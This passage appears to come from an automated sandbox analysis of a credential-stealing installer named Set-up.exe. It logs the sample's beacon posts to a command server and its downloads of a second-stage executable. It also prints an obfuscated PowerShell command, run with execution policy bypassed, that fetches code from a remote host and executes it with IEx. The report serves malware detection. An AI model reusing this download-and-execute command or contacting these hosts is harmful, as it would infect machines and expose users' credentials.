                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UwF7Gy5TIVz1z1J1tPeN1%2FMwaqL3Q%2B5j017EtT7skZ6KJRCDPzh8kdT4ehK2yHVd5NcbM3IVKQm1Mkt7gp4rquPyC4q7Es3gMV10mgI2YADN%2B%2BM2a4DvTBQUX%2FNyq5dg9Wc93Uiw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fd553bb0e9a4388-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2204&min_rtt=2201&rtt_var=832&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2850&recv_bytes=19072&delivery_rate=1310592&cwnd=221&unsent_bytes=0&cid=1b2d2cb817ae74e4&ts=972&x=0"
2025-01-05 17:53:19 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-05 17:53:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49751 | 104.21.87.84 | 443 | 3492 | C:\Users\user\Desktop\Set-up.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 17:53:20 UTC | 283 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=4LOL4O0HVV003F1EU
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 8778
                                                                                                                                                                                                                                                            Host: cellardesiresso.sbs
                                                                                                                                                                                                                                                            2025-01-05 17:53:20 UTC8778OUTData Raw: 2d 2d 34 4c 4f 4c 34 4f 30 48 56 56 30 30 33 46 31 45 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 32 37 43 46 34 35 42 38 45 38 33 37 31 37 38 35 45 37 34 42 43 34 45 39 34 36 39 31 42 35 0d 0a 2d 2d 34 4c 4f 4c 34 4f 30 48 56 56 30 30 33 46 31 45 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 4c 4f 4c 34 4f 30 48 56 56 30 30 33 46 31 45 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 4a 45 4e 59 41 0d 0a 2d
                                                                                                                                                                                                                                                            Data Ascii: --4LOL4O0HVV003F1EUContent-Disposition: form-data; name="hwid"C127CF45B8E8371785E74BC4E94691B5--4LOL4O0HVV003F1EUContent-Disposition: form-data; name="pid"2--4LOL4O0HVV003F1EUContent-Disposition: form-data; name="lid"hRjzG3--JENYA-
2025-01-05 17:53:20 UTC | 1134 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 17:53:20 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=42l13no9nfu4lritgdd5emv847; expires=Thu, 01 May 2025 11:39:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YP68bKANhVSlseYcLASoYGQba7gWMUGKjdxcPIxsqAcH%2Bkq07ERruXrvZ9qdAv01VXEIl73%2Ffr0xizs4stb7twYwryKis%2FcOuyWyWGGDx3xZMFimxAIUuMebTlpT%2FX%2BbKr8MmB1%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fd553c4ff897cea-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1913&min_rtt=1906&rtt_var=729&sent=11&recv=15&lost=0&retrans=0&sent_bytes=2850&recv_bytes=9719&delivery_rate=1486761&cwnd=226&unsent_bytes=0&cid=3211bdfe8046996c&ts=580&x=0"
2025-01-05 17:53:20 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
2025-01-05 17:53:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49752 | 104.21.87.84 | 443 | 3492 | C:\Users\user\Desktop\Set-up.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 17:53:21 UTC | 283 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=1CTPDNSQLA59CQLB
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 20425
                                                                                                                                                                                                                                                            Host: cellardesiresso.sbs
                                                                                                                                                                                                                                                            2025-01-05 17:53:21 UTC15331OUTData Raw: 2d 2d 31 43 54 50 44 4e 53 51 4c 41 35 39 43 51 4c 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 32 37 43 46 34 35 42 38 45 38 33 37 31 37 38 35 45 37 34 42 43 34 45 39 34 36 39 31 42 35 0d 0a 2d 2d 31 43 54 50 44 4e 53 51 4c 41 35 39 43 51 4c 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 31 43 54 50 44 4e 53 51 4c 41 35 39 43 51 4c 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 4a 45 4e 59 41 0d 0a 2d 2d 31 43
                                                                                                                                                                                                                                                            Data Ascii: --1CTPDNSQLA59CQLBContent-Disposition: form-data; name="hwid"C127CF45B8E8371785E74BC4E94691B5--1CTPDNSQLA59CQLBContent-Disposition: form-data; name="pid"3--1CTPDNSQLA59CQLBContent-Disposition: form-data; name="lid"hRjzG3--JENYA--1C
2025-01-05 17:53:22 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 17:53:22 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=ht2nlv43hleau5l39pphhmbnlu; expires=Thu, 01 May 2025 11:40:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rEUdFJFPm2kC8Pku3CjFpHebh5fyhbKGjA%2BFGU51d9nNmomMUrCD0QLm%2B1jtqoD4zz5JJlAzmJ8sK5sn2TgcApXGQG4sJzIIPE4eZHrRQTTac3SprWk83Rnv7VO5FV4DHQ9OV5aq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fd553cc78dc42ce-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1600&rtt_var=613&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2850&recv_bytes=21388&delivery_rate=1766485&cwnd=233&unsent_bytes=0&cid=90cdea033cdb32d2&ts=938&x=0"
2025-01-05 17:53:22 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
2025-01-05 17:53:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49753 | 104.21.87.84 | 443 | 3492 | C:\Users\user\Desktop\Set-up.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 17:53:23 UTC | 274 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=1I1ML2QD2
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 944
                                                                                                                                                                                                                                                            Host: cellardesiresso.sbs
                                                                                                                                                                                                                                                            2025-01-05 17:53:23 UTC944OUTData Raw: 2d 2d 31 49 31 4d 4c 32 51 44 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 32 37 43 46 34 35 42 38 45 38 33 37 31 37 38 35 45 37 34 42 43 34 45 39 34 36 39 31 42 35 0d 0a 2d 2d 31 49 31 4d 4c 32 51 44 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 49 31 4d 4c 32 51 44 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 4a 45 4e 59 41 0d 0a 2d 2d 31 49 31 4d 4c 32 51 44 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                                                                                                                                                                                                                            Data Ascii: --1I1ML2QD2Content-Disposition: form-data; name="hwid"C127CF45B8E8371785E74BC4E94691B5--1I1ML2QD2Content-Disposition: form-data; name="pid"1--1I1ML2QD2Content-Disposition: form-data; name="lid"hRjzG3--JENYA--1I1ML2QD2Content-Disp
2025-01-05 17:53:23 UTC | 1124 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 17:53:23 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=p48o41usnsji53ndc1odvb8phd; expires=Thu, 01 May 2025 11:40:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oAz1Ty2r99WwFzYxBQw6Z2uAHml6zt%2ByJsBgbuM4lPLz8fySRdrOHc6CRAN2tAfhoYB14KP052fuRC2SHWQ1Gh1pYcA5ePrnq5UbLt05Ict%2FhuFk26PDI5obw7P3cWO180F09fBR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fd553da1f306a5f-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1577&rtt_var=599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1854&delivery_rate=1813664&cwnd=188&unsent_bytes=0&cid=31be39aeeaee14a0&ts=489&x=0"
2025-01-05 17:53:23 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-05 17:53:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49755 | 104.21.87.8 | 443 | 3492 | C:\Users\user\Desktop\Set-up.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 17:53:24 UTC | 276 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=61SO7GFGNS
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 1054
                                                                                                                                                                                                                                                            Host: cellardesiresso.sbs
2025-01-05 17:53:24 UTC | 1054 | OUT | Data Ascii: --61SO7GFGNSContent-Disposition: form-data; name="hwid"C127CF45B8E8371785E74BC4E94691B5--61SO7GFGNSContent-Disposition: form-data; name="pid"1--61SO7GFGNSContent-Disposition: form-data; name="lid"hRjzG3--JENYA--61SO7GFGNSContent-
2025-01-05 17:53:25 UTC | 1132 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 17:53:25 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=nqt0glhb1b8juj08502b0rnjli; expires=Thu, 01 May 2025 11:40:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PH%2BOhGaMnEUNg1Do8ozec4wl%2BXovY3OxVRaIyvkc0H%2FS5xj0RTKwXiXnW0%2B1CgE0PxoJ8UyLFyLsNu%2F9UjT8Z7tJwvWIO%2BUpLn323xsNP1h8GXl8nuDmb1dvpLQzwe6WJf6pS5oS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fd553e08f5243aa-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2386&min_rtt=2152&rtt_var=974&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=1966&delivery_rate=1356877&cwnd=241&unsent_bytes=0&cid=1e1655568461294c&ts=570&x=0"
2025-01-05 17:53:25 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2025-01-05 17:53:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49756 | 104.21.87.8 | 443 | 3492 | C:\Users\user\Desktop\Set-up.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 17:53:25 UTC | 268 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 114
                                                                                                                                                                                                                                                            Host: cellardesiresso.sbs
2025-01-05 17:53:25 UTC | 114 | OUT | Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--JENYA&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=C127CF45B8E8371785E74BC4E94691B5
2025-01-05 17:53:26 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 17:53:26 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=gvav56r73su82s2ne8msacjb0q; expires=Thu, 01 May 2025 11:40:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3losGlthNzl6GTeTlJtYLrfjCCKzx800XhmMnDbR7nursrMXKgZlZ%2F4oyY8MRFEdyPwf0I%2B5Xb2YfaUyiDmUUwNsKqyko8B2qmIq%2Fmh3TW90IQRjT2RwFqr4v%2FZInnYFR%2B51MKjo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fd553e75d5f8c83-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1962&min_rtt=1962&rtt_var=981&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4240&recv_bytes=1018&delivery_rate=261087&cwnd=189&unsent_bytes=0&cid=82d45fc4977f4902&ts=599&x=0"
2025-01-05 17:53:26 UTC | 218 | IN | Data Ascii: d41Fc3eSo3gOFRBKLRW8DJSLV0GkHJTInlcD4l8mncZgGPLBUMCA2iiSVw0qJhnOYUmhd/Jrxi+o0fTnndUelRNeZhBU0eAdzOIWyMpSO062SXEm5j836lxxUcH8MU8B0joXUNW0JD9JEiPv7+B++iJNwEbDSkJfqQGRBWmgasOi69OUMmSVvwviJsw/8vuL1qmVZ8Net2uclSWwfIWaE7
2025-01-05 17:53:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49757 | 185.161.251.21 | 443 | 3492 | C:\Users\user\Desktop\Set-up.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 17:53:26 UTC | 201 | OUT | GET /8574262446/ph.txt HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Host: cegu.shop
2025-01-05 17:53:27 UTC | 249 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.26.2
                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 17:53:27 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 329
                                                                                                                                                                                                                                                            Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            ETag: "676c9e2a-149"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
2025-01-05 17:53:27 UTC | 329 | IN | Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49758 | 172.67.208.58 | 443 | 3492 | C:\Users\user\Desktop\Set-up.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-05 17:53:27 UTC | 206 | OUT | GET /int_clp_sha.txt HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Host: klipvumisui.shop
2025-01-05 17:53:27 UTC | 909 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 17:53:27 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 8767044
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            ETag: "51f99eddd33cc04fb0f55f873b76d907"
                                                                                                                                                                                                                                                            Last-Modified: Sat, 28 Dec 2024 20:49:42 GMT
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=64FFvFOdqtR8H6uhAcpONke6uWvw2kA%2BaXZzr8aWNOygUhmy0szfvj9HPUTb%2F9i%2B1dyNxte%2BRDX4G7F2z0OvhDScUk5FByKWhBEDTz6Q7%2BOiT%2FqPo9E1s97mjj16tg%2BZC6Wz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fd553f45dc4c448-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1700&rtt_var=647&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2868&recv_bytes=820&delivery_rate=1679125&cwnd=230&unsent_bytes=0&cid=b7c06752ccd7c852&ts=320&x=0"
2025-01-05 17:53:27 UTC | 460 | IN | Data Ascii: MZP@!L!This program must be run under Win32$7



                                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                                            Start time:12:53:04
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Set-up.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:74'868'247 bytes
                                                                                                                                                                                                                                                            MD5 hash:956E50E278ACBF39DFCA43E8BA78F112
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1855025285.000000000065D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                                                            Start time:12:53:25
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a
                                                                                                                                                                                                                                                            Imagebase:0xf70000
                                                                                                                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                                            Start time:12:53:25
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
